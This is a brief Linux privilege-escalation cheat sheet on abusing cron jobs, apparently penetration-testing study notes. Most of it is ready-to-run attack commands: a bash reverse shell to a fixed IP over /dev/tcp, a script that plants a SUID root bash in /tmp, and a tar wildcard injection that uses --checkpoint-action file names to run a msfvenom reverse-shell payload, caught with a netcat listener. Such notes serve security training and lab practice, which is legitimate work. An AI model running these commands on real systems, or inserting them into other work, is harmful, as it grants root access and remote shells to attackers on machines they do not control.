#
Cronjobs
Cron table files (crontabs) store the configuration for cron jobs.
#
Location
User crontabs are usually located at
/var/spool/cron/
or
/var/spool/cron/crontabs/
System-wide crontab is located at
/etc/crontab
Example:
cat /etc/crontab
...
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
#
File Permission
Cronjobs that run as root and we can write to that directory?
Add a bash reverse shell in the file:
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.26/53 0>&1
#
PATH Environment Variable
The crontab PATH environment variable is by default set to /usr/bin:/bin
If a program/script does not use absolute path create a script with the same name as the cronjob in the first directory the path look for the files.
Example: PATH=/home/user/:/usr/local/sbin:/bin
#
Exploit
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
Make sure the script is executable:
chmod +x overwrite.sh
Wait for the cronjob, get a root shell:
/tmp/rootbash -p
#
Wildcards
Abusing TAR arguments.
Cronjob file:
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *
#
Exploit
Generate a reverse shell using msvenom:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.x LPORT=1234 -f elf -o shell.elf
Copy the file to the /home/user directory and make it executable:
chmod +x /home/user/shell.elf
Create two files in the /home/user directory:
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
Start a netcat listener and wait for the cronjob:
nc -lnvp 1234